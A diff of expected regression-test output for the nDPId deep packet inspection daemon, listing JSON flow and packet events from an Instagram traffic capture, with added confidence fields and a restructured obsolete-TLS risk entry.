+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1436720908524,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1436720908524,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICINDADUANycOb2MBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1436720908533,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1436720908533,"pkt":"ABsv8H60QPMIw47hCABFAABL7oJAAEARewDAqABnCAgICGesADUANyZVhbMBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"}
 00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1436720908570,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"ts_msec":1436720908570,"pkt":"QPMIw47hABsv8H60CABFAAEjliwAADgRGn8ICAgIwKgAZwA1yBMBD5NUN7CBgAABAAoAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAZACoQaWdjZG4tcGhvdG9zLWgtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAADHJABYFYTE0MDgGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGrsBxAAEAAQAAABMABC4hRqHAcQABAAEAAAATAAQuIUawwHEAAQABAAAAEwAELiFGpsBxAAEAAQAAABMABC4hRo\/AcQABAAEAAAATAAQuIUagwHEAAQABAAAAEwAELiFGqcBxAAEAAQAAABMABC4hRrc="}
-00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}}
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1436720908575,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1436720908575,"pkt":"QPMIw47hABsv8H60CABFAADD9CwAADgRvN4ICAgIwKgAZwA1g0MAr7pub2OBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAhACoQaWdjZG4tcGhvdG9zLWEtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFRcABYFYTEwMDEGZHNwdzQwBmFrYW1hacAmwHEAAQABAAAAEwAEUlUamsBxAAEAAQAAABMABFJVGpk="}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1436720908579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1436720908579,"pkt":"QPMIw47hABsv8H60CABFAADD9DAAADgRvNoICAgIwKgAZwA1Z6wAr0GdhbOBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAA3ACoQaWdjZG4tcGhvdG9zLWctYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFQ9ABYFYTEwMDcGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGiMBxAAEAAQAAABMABC4hRo4="}
-00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}}
+00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
